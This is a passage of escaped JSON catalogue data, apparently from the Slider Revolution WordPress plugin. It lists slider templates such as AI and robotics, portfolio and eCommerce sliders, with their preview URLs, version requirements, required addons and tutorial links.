Package\",\"alias\":\"ai--robotics-webside-slider-package\",\"zip\":\"\",\"uid\":\"ai--robotics-webside-slider-package\",\"img\":\"packages\\/ai-and-robotics-website-slider-package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/ai-and-robotics-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=ai-and-robotics-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.20\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Have a glimpse of the future of robots and artificial intelligence. A vivid-looking slider, perfect for tech companies and startups.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-04-19 15:12:25\",\"package\":\"Ai & Robotics Webside Slider Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Sleek Slider Design for Your High-Tech Brand [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-sleek-slider-design-for-your-high-tech-brand\\/\",\"guide_img\":\"tutorial\\/Ai-Robotics.png\",\"active\":\"1\",\"package_id\":\"57\",\"installed\":false},\"610\":{\"id\":\"655\",\"title\":\"Ai & Robotics Website Slider\",\"alias\":\"ai-and-robotics-website-slider\",\"zip\":\"packs\\/ai-and-robotics-website-slider.zip\",\"uid\":\"e40b7296d1519972029e9744a0c09b29\",\"img\":\"ai-and-robotics-website-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/ai-and-robotics-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=ai-and-robotics-website-slider\",\"version\":\"1.0.1\",\"required\":\"6.5.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Have a glimpse of the future of robots and artificial intelligence. A vivid-looking slider, perfect for tech companies and startups.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-04-19 15:16:48\",\"package\":\"Ai & Robotics Webside Slider Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Sleek Slider Design for Your High-Tech Brand [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-sleek-slider-design-for-your-high-tech-brand\\/\",\"guide_img\":\"tutorial\\/Ai-Robotics.png\",\"active\":\"1\",\"package_id\":\"57\",\"installed\":false,\"is_new\":true},\"611\":{\"id\":\"656\",\"title\":\"AI Video Modal\",\"alias\":\"ai-video-modal\",\"zip\":\"packs\\/ai-video-modal.zip\",\"uid\":\"aab36a599413b7e66dfdda8f517b47b1\",\"img\":\"ai-video-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/ai-and-robotics-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=ai-and-robotics-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Have a glimpse of the future of robots and artificial intelligence. A vivid-looking slider, perfect for tech companies and startups.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-04-19 15:20:55\",\"package\":\"Ai & Robotics Webside Slider Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Sleek Slider Design for Your High-Tech Brand [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-sleek-slider-design-for-your-high-tech-brand\\/\",\"guide_img\":\"tutorial\\/Ai-Robotics.png\",\"active\":\"1\",\"package_id\":\"57\",\"installed\":false},\"612\":{\"id\":\"657\",\"title\":\"Minimal Typography Website Slider\",\"alias\":\"minimal-typography-website-slider\",\"zip\":\"minimal-typography-website-slider.zip\",\"uid\":\"43cf63d6541d33b7d4e59350935d73bf\",\"img\":\"minimal-typography-website-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/minimal-typography-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-typography-website-slider\",\"version\":\"1.0.1\",\"required\":\"6.5.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Make the hero section on your website stand out with this minimal, typography-based hero slider, featuring cool parallax bubble effects and fluid slide transitions.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-04-25 14:39:36\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Transform the Mood of Your Home Page with Duotones [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-transform-the-mood-of-your-home-page-with-duotones\\/\",\"guide_img\":\"tutorial\\/duotone-typography-website-slider.png\",\"active\":\"1\",\"installed\":false},\"613\":{\"id\":\"658\",\"title\":\"404 Page Collection\",\"alias\":\"404-page-collection\",\"zip\":\"404-page-collection.zip\",\"uid\":\"3f0b25b5e893b170536a498939465a1a\",\"img\":\"404-page-collection\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/404-page-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=404-page-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.21\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Show your lost website visitors a funny and lighthearted message with our 404 page template collection.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":null,\"date\":\"2022-05-04 11:30:30\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Effective Thank You Page for Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-effective-thank-you-page-for-your-website\\/\",\"guide_img\":\"tutorial\\/404-page-collection.png\",\"active\":\"1\",\"installed\":false},\"614\":{\"id\":\"659\",\"title\":\"eCommerce Product Slider\",\"alias\":\"ecommerce-sale-slider\",\"zip\":\"ecommerce-sale-slider.zip\",\"uid\":\"49ca4743090cddca705ee108eae967c5\",\"img\":\"ecommerce-sale-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/ecommerce-product-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=ecommerce-product-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.22\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">So you have an eCommerce shop and are looking for the ultimate sales pitch on your landing page? Trying to convert your precious visitors into more sales? Look no further than our eCommerce Product Slider!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-05-17 14:22:52\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Get More Eyes on Your eCommerce Sales Promotion [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-get-more-eyes-on-your-ecommerce-sales-promotion\\/\",\"guide_img\":\"tutorial\\/ecommerce-sale-slider.png\",\"active\":\"1\",\"installed\":false},\"615\":{\"id\":\"660\",\"title\":\"Fashion Shop Slider\",\"alias\":\"fashion-shop-slider\",\"zip\":\"fashion-shop-slider.zip\",\"uid\":\"e488e9126dbe4a34c02c89a1115f4ff9\",\"img\":\"fashion-shop-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fashion-shop-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fashion-shop-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.22\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Customize texts, images, and colors in seconds and have this beast of a shop slider running on your own website in no time.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-05-18 13:24:56\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Colorful Retro Effect for the Home Page Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-colorful-retro-effect-for-the-home-page-slider\\/\",\"guide_img\":\"tutorial\\/fashion-shop-slider.png\",\"active\":\"1\",\"installed\":false},\"616\":{\"id\":\"661\",\"title\":\"Lingerie Store Website Slider\",\"alias\":\"lingerie-store-website-slider\",\"zip\":\"lingerie-store-website-slider.zip\",\"uid\":\"7bdad27521b7c9b171b618dff2fa0315\",\"img\":\"lingerie-store-website-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/lingerie-store-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=lingerie-store-website-slider\",\"version\":\"1.0.2\",\"required\":\"6.5.22\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This hero slider also includes optional menu navigation and links, in case you want to use it as a standalone landing page.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-05-18 13:28:21\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false,\"is_new\":true},\"617\":{\"id\":\"662\",\"title\":\"Beach Events Hero Collection\",\"alias\":\"beach-events-hero-collection\",\"zip\":\"beach-events-hero-collection.zip\",\"uid\":\"cf87cd65572e9bc4ee019cceae1c75f8\",\"img\":\"beach-events-hero-collection\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/summer-beach-events-hero-collection?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=summer-beach-events-hero-collection\",\"version\":\"1.0.1\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">These hero image templates offer a high-octane mix of headlines, images, and special effects.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 16:56:11\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Sell More Event Tickets with a High-Energy Hero Section [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/sell-more-event-tickets-with-a-high-energy-hero-section\\/\",\"guide_img\":\"tutorial\\/beach-events-hero-collection.png\",\"active\":\"1\",\"installed\":false},\"618\":{\"id\":\"663\",\"title\":\"Creative Portfolio Website Slider Package\",\"alias\":\"creative-portfolio-website-slider-package\",\"zip\":\"\",\"uid\":\"creative-portfolio-website-slider-package\",\"img\":\"packages\\/creative-portfolio-website-slider-package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:00:43\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"619\":{\"id\":\"664\",\"title\":\"Creative Portfolio Main Slider\",\"alias\":\"creative-portfolio-main-slider\",\"zip\":\"packs\\/creative-portfolio-main-slider.zip\",\"uid\":\"2b01de6e46611e4353f1687609aa6783\",\"img\":\"creative-portfolio-main-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:03:03\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"620\":{\"id\":\"665\",\"title\":\"Creative Portfolio Project 1\",\"alias\":\"creative-portfolio-project-1\",\"zip\":\"packs\\/creative-portfolio-project-1.zip\",\"uid\":\"f1e3a170d3f06d7162445fe9cce99335\",\"img\":\"creative-portfolio-project-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:07:45\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"621\":{\"id\":\"666\",\"title\":\"Creative Portfolio Project 2\",\"alias\":\"creative-portfolio-project-2\",\"zip\":\"packs\\/creative-portfolio-project-2.zip\",\"uid\":\"59369faef5b4a0571cd5fd72432d2d20\",\"img\":\"creative-portfolio-project-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:12:09\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"622\":{\"id\":\"667\",\"title\":\"Creative Portfolio Project 3\",\"alias\":\"creative-portfolio-project-3\",\"zip\":\"packs\\/creative-portfolio-project-3.zip\",\"uid\":\"ac6823b9ffeba97c56aa6f4593109e5f\",\"img\":\"creative-portfolio-project-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:14:02\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"623\":{\"id\":\"668\",\"title\":\"Creative Portfolio Project 4\",\"alias\":\"creative-portfolio-project-4\",\"zip\":\"packs\\/creative-portfolio-project-4.zip\",\"uid\":\"31f5cc4c9d13af7b56adfa7b7c84dce9\",\"img\":\"creative-portfolio-project-4\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:16:40\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"624\":{\"id\":\"669\",\"title\":\"Creative Portfolio Project 5\",\"alias\":\"creative-portfolio-project-5\",\"zip\":\"packs\\/creative-portfolio-project-5.zip\",\"uid\":\"23c8e18d556da040ef6ac2382d4a7b94\",\"img\":\"creative-portfolio-project-5\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:20:22\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-great-looking-masonry-portfolio-for-your-home-page\\/\",\"guide_img\":\"tutorial\\/Creative-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"58\",\"installed\":false},\"625\":{\"id\":\"670\",\"title\":\"Creative Portfolio Project 6\",\"alias\":\"creative-portfolio-project-6\",\"zip\":\"packs\\/creative-portfolio-project-6.zip\",\"uid\":\"518434a06d7a959bd3f3e0905e252209\",\"img\":\"creative-portfolio-project-6\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/creative-portfolio-website-slider?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=creative-portfolio-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.25\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This one-page portfolio website template was built to impress. Shine a spotlight on all your work with this striking, interactive design and wow prospective clients the second they step foot inside your site.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-07-18 17:21:51\",\"package\":\"Creative Portfolio Website Slider Package\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Great-looking Masonry Portfolio for Your Home Page 